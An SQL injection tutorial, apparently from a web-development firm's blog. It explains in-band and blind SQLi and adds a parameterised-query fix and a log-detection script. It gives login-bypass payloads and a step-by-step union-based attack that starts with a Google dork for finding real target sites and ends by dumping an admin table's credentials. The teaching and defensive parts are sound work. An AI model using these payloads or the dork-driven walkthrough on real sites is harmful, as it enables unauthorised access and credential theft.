SQL injection is a code injection technique used to attack websites and data-driven applications, and to corrupt or destroy databases, by inserting malicious SQL statements into input fields for execution (for example, to dump the contents of the database). These statements control the database server behind the web application.
“The OWASP organization (Open Web Application Security Project) has published a list of injections in its OWASP Top 10 document and has declared them as the number one threat to web application security.”
SQL injection attacks are among the oldest, most frequent and most dangerous web application vulnerabilities. A SQL injection vulnerability can affect any application or website that uses a SQL database such as MySQL, Oracle, SQL Server or others.
SQL injection can be exploited in different ways to cause serious problems. By taking advantage of SQL injection, an attacker can bypass authentication and read, modify and delete data within a database. In some cases, SQL injection can even be used to execute commands on the operating system, potentially allowing the attacker to reach further into a network behind a firewall.
In-band SQL injection is the most common and easiest-to-exploit kind of SQL injection attack. It occurs when the attacker uses the same communication channel both to launch the attack and to gather the results. The two most common types of in-band SQL injection are error-based SQLi and union-based SQLi.
Inferential SQL injection, unlike in-band SQLi, may take longer to exploit, but it is just as dangerous as any other form of SQLi. In an inferential SQLi attack, no data is actually transferred via the web application, so the attacker cannot see the result of the attack in-band (which is why these attacks are commonly referred to as “Blind SQL Injection Attacks”). Instead, the attacker reconstructs the database structure by sending payloads and observing the response of the web application and the resulting behaviour of the database server.
There are two types of inferential SQL injection, as described below.
The following example shows how an attacker can use a SQL injection vulnerability to bypass the application's security controls and authenticate as an administrator.
The script below runs on a web server. It is an example of authentication with a username and password. The sample database has a table called users with two columns: username and password.
username = request.POST['username']
password = request.POST['password']
# Generate the SQL command by concatenating untrusted input into the query text (vulnerable to SQL injection)
sql_query = "SELECT id FROM users WHERE username='" + username + "' AND password='" + password + "'"
# Execute the SQL command
cursor.execute(sql_query)
These input fields are vulnerable to SQL injection. An attacker could enter SQL commands in the input fields in a way that alters the SQL statement executed by the database server. For example:
As a result, the database server executes the following SQL query:
Because of the OR 1 = 1, the WHERE clause returns the first id of the users table, regardless of the username and password. The first user ID in a database is very often the administrator. In this way, the attacker not only bypasses authentication but also obtains administrator privileges. The attacker can also comment out the rest of the SQL statement to further control the execution of the query:
-- MySQL, MSSQL, Oracle, PostgreSQL, SQLite
' OR '1'='1' --
' OR '1'='1' /*
' OR '1'='1' #
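To make the bypass concrete from the defender's side, here is an added example (not from the original article) that runs the concatenated query above against a constructed in-memory SQLite users table with the ' OR '1'='1' -- payload, next to the parameterised form that is the standard fix; the table rows are constructed sample data.

```python
import sqlite3

# Constructed sample data (example only): a users table with username and password
# columns, as in the snippet above; the first row is the administrator.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                     [("admin", "s3cr3t-admin"), ("alice", "wonderland")])
    return conn

def login_vulnerable(conn, username, password):
    """String concatenation exactly as in the snippet above: attacker input becomes
    part of the SQL text, so ' OR '1'='1' -- rewrites the WHERE clause and the
    trailing -- comments out the password check."""
    sql_query = ("SELECT id FROM users WHERE username='" + username +
                 "' AND password='" + password + "'")
    row = conn.execute(sql_query).fetchone()
    return row[0] if row else None

def login_safe(conn, username, password):
    """Parameterised query: the driver passes the values separately from the SQL
    text, so the same payload is compared literally against the username column."""
    sql_query = "SELECT id FROM users WHERE username=? AND password=?"
    row = conn.execute(sql_query, (username, password)).fetchone()
    return row[0] if row else None

PAYLOAD = "' OR '1'='1' --"  # the first comment form listed above

def demo():
    """Returns the user id each login variant resolves to (None = login refused)."""
    conn = make_db()
    return {
        "vulnerable_with_payload": login_vulnerable(conn, PAYLOAD, "anything"),
        "safe_with_payload": login_safe(conn, PAYLOAD, "anything"),
        "safe_with_real_creds": login_safe(conn, "alice", "wonderland"),
    }

if __name__ == "__main__":
    print(demo())
```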
One of the most common types of SQL injection uses the UNION operator, which allows the attacker to combine the results of two or more SELECT statements into a single result set. The technique is called union-based SQL injection.
Step 1: Use a Google dork to find a link with a query parameter, e.g.
inurl:.php?id=3 site:.nl
Step 2: After finding the link, check whether a database sits behind it.
Take the link found above, e.g. http://www.xyz.com/content.php?Id=-2 or Id=2, and append a single quote (') after the number (in our case 3). If the page shows an error when the URL is requested, a database exists behind the website.
Step 3: This step checks the number of tables in the website's database:
http://www.xyz.com/content.php?Id=-2 order by 1,2,3,4,5,6,7,8,9,10,11,12,13 --+-
Step 4: After checking the number of tables, select the one that is displayed on the webpage:
http://www.xyz.com/content.php?Id=-2 union select table_name,3,4,5,6,7,8,9,10,11,12,13 from information_schema.tables --+-
Step 5: This step concatenates the table names so we can pick the one to target:
http://www.xyz.com/content.php?Id=-2 union select 1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13 from information_schema.tables where table_schema=database() --+-
Step 6: Retrieve all the column names from the table:
http://www.xyz.com/content.php?Id=-2 union select 1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13 from information_schema.columns where table_name='tbl_admin' --+
Step 7: Retrieve the required fields from the table:
http://www.xyz.com/content.php?Id=-2 union select 1,group_concat(plugin,' $$$',pass),3,4,5,6,7,8,9,10,11,12,13 from tbl_admin --+-
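As an added example that is not part of the original post, the following detection logic scans constructed web-server access-log lines for the probing pattern the steps above leave behind (a single-quote error probe, ORDER BY column probing, UNION SELECT, information_schema and group_concat in the decoded query string) and reports clients that trip several signatures; the log format, paths and IP addresses are constructed samples.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, unquote_plus

# Signatures for the probing steps described above. Applied to the URL-decoded
# query string, so %20 and + are already spaces when these run.
SIGNATURES = {
    "quote_probe": re.compile(r"'$"),                          # Id=2'  (Step 2)
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),  # Step 3
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "schema_enum": re.compile(r"\binformation_schema\b", re.I),
    "group_concat": re.compile(r"\bgroup_concat\s*\(", re.I),
    "comment_tail": re.compile(r"--\s|/\*"),                   # --+- decodes to "-- -"
}

# Common Log Format: ip ident user [time] "METHOD target PROTO" status bytes
LOG_LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Constructed sample log (not from a real server).
SAMPLE_LOG = """\
203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET /content.php?Id=2 HTTP/1.1" 200 512
203.0.113.7 - - [01/Jan/2024:10:00:02 +0000] "GET /content.php?Id=2' HTTP/1.1" 500 120
203.0.113.7 - - [01/Jan/2024:10:00:03 +0000] "GET /content.php?Id=-2%20order%20by%2013%20--+- HTTP/1.1" 200 512
203.0.113.7 - - [01/Jan/2024:10:00:04 +0000] "GET /content.php?Id=-2%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20--+- HTTP/1.1" 200 900
198.51.100.4 - - [01/Jan/2024:10:00:05 +0000] "GET /content.php?Id=7 HTTP/1.1" 200 512
"""

def matched_signatures(target):
    """Return the set of signature names found in the decoded query string of a request target."""
    query = unquote_plus(urlsplit(target).query)
    return {name for name, rx in SIGNATURES.items() if rx.search(query)}

def analyse(log_text):
    """Group signature hits by client IP. A client that trips two or more distinct
    signatures, or any UNION SELECT at all, is reported as a union-based SQLi attempt."""
    hits = defaultdict(set)
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        hits[m["ip"]] |= matched_signatures(m["target"])
    return {ip: sorted(s) for ip, s in hits.items() if len(s) >= 2 or "union_select" in s}

if __name__ == "__main__":
    for ip, sigs in analyse(SAMPLE_LOG).items():
        print(ip, sigs)
```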
After working through these examples, we can manually check our own web application for data-breach vulnerabilities. Here "data breaching" means obtaining all the data of the web application through unauthorised access. We provide the best web development support and mobile development services; contact us if you have something to build.
Tell your friends and colleagues about these threats if they are unaware of them; it can save their money and their data from destruction. If you have any questions, ask in the comment section.